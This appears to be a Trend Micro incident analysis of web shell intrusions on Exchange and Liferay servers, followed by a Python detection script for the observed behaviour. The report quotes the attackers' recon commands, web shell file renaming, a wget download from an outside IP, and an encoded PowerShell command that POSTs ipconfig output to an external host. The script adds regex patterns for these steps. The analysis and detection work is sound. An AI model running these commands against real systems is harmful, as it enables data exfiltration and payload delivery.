Trend Micro -
Both servers are using Liferay CE version 6.2, which is vulnerable to CVE-2020-7961 (possibly leading to remote code execution).
Incident # 2
Similar to the first incident, the malicious actor accesses the server via a web shell and then starts to gather basic information on the system. However, the second incident used PowerShell for different post-exploitation activities.
Our analysis shows that a Wget request was sent to a URL on a high-numbered port. Unfortunately, we have no information on what was downloaded, since the URL was already dead by the time of analysis.
"C:\Windows\System32\cmd.exe" /c powershell wget http://209.14.0[.]234:56138/iMCRufG79yXvYjH0W1SK
The following commands were executed in order to gather basic system information:
cmd.exe /c ipconfig
cmd.exe /c dir
"c:\windows\system32\cmd.exe" /c ping -n 1 google.com
"c:\windows\system32\cmd.exe" /c whoami
The web shell was then copied and the original entry deleted using the following commands:
cmd.exe /c ren C:\inetpub\wwwroot\aspnet_client\errorFF.aspx.req errorFF.aspx
"c:\windows\system32\cmd.exe" /c del "C:\Program Files\Microsoft\Exchange Server\V15\FrontEnd\HttpProxy\owa\auth\errorFF.aspx.req"
The output of ipconfig /all was then sent out as the body of a wget POST request.
The following shows the PowerShell-encoded (top) and decoded (bottom) commands:
"c:\windows\system32\cmd.exe" /c powershell.exe -exec bypass -enc JAByAD0AaQBwAGMAbwBuAGYAaQBnACAALwBhAGwAbAAgAHwAIABvAHUAdAAtAHMAdAByAGkAbgBnADsAdwBnAGUAdAAgAC0AVQByAGkAIABoAHQAdABwADoALwAvADkAMQAuADkAMgAuADEAMwA2AC4AMgA1ADAAOgA0ADQAMwA/AFMAZABmAGEAPQBmAGQAcwBzAGQAYQBkAHMAZgBzAGYAYQAgAC0ATQBlAHQAaABvAGQAIABQAG8AcwB0ACAALQBCAG8AZAB5ACAAJAByACAALQBDAG8AbgB0AGUAbgB0AFQAeQBwAGUAIAAiAGEAcABwAGwAaQBjAGEAdABpAG8AbgAvAG8AYwB0AGUAdAAtAHMAdAByAGUAYQBtACIA
$r=ipconfig /all | out-string;wget -Uri http://18.104.22.168:443?Sdfa=fdssdadsfsfa -Method Post -Body $r -ContentType "application/octet-stream"
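A detection-side illustration of the chain above, added here as an example and not part of the original report: it decodes the UTF-16LE/base64 payload behind a `-enc` argument and tags process-creation events for the behaviours seen in this incident (cmd spawned by the IIS worker, recon commands, `.aspx` file tampering, an HTTP POST exfil). The event records and the C2 host are constructed placeholders.

```python
import base64
import re

# -EncodedCommand and the abbreviations powershell.exe accepts (-e, -ec, -en, -enc).
ENC_FLAG = re.compile(r"-(?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]{8,})", re.I)
RECON = re.compile(r"\b(whoami|ipconfig|dir|ping|systeminfo)\b", re.I)
EXFIL = re.compile(r"\b(wget|iwr|curl|Invoke-WebRequest)\b.*-Method\s+Post", re.I)
SHELL_TAMPER = re.compile(r"\b(ren|del|copy|move)\b.*\.aspx", re.I)
WEB_WORKERS = {"w3wp.exe"}  # IIS worker process; Exchange OWA/ECP code runs inside it


def decode_encoded_command(cmdline):
    """Return the plaintext behind a -enc argument (UTF-16LE under base64), or None."""
    m = ENC_FLAG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None  # truncated or non-PowerShell base64: leave for manual review


def triage(parent, cmdline):
    """Tag one process-creation event; matching also runs over the decoded payload."""
    decoded = decode_encoded_command(cmdline)
    text = cmdline + (" " + decoded if decoded else "")
    findings = set()
    if parent.lower() in WEB_WORKERS:
        findings.add("webshell-child-process")
    if decoded:
        findings.add("encoded-powershell")
    if RECON.search(text):
        findings.add("recon")
    if EXFIL.search(text):
        findings.add("http-post-exfil")
    if SHELL_TAMPER.search(text):
        findings.add("webshell-file-tamper")
    return sorted(findings)


# Constructed sample: the decoded exfil command from the incident, re-encoded the way
# powershell.exe -enc expects. C2_PLACEHOLDER stands in for the real host.
EXFIL_CMD = ('$r=ipconfig /all | out-string;wget -Uri http://C2_PLACEHOLDER:443/?Sdfa=x '
             '-Method Post -Body $r -ContentType "application/octet-stream"')
ENCODED = base64.b64encode(EXFIL_CMD.encode("utf-16-le")).decode("ascii")

SAMPLE_EVENTS = [  # (parent image, child command line); constructed, not real telemetry
    ("w3wp.exe", "cmd.exe /c whoami"),
    ("w3wp.exe", "cmd.exe /c ren C:\\inetpub\\wwwroot\\aspnet_client\\errorFF.aspx.req errorFF.aspx"),
    ("w3wp.exe", f'"c:\\windows\\system32\\cmd.exe" /c powershell.exe -exec bypass -enc {ENCODED}'),
    ("explorer.exe", "cmd.exe /c ipconfig"),
]

if __name__ == "__main__":
    for parent, cmdline in SAMPLE_EVENTS:
        print(parent, "->", triage(parent, cmdline))
```

The last sample event (ipconfig from an interactive parent) only earns a "recon" tag, which is the point: the parent-process context is what separates routine administration from web shell activity.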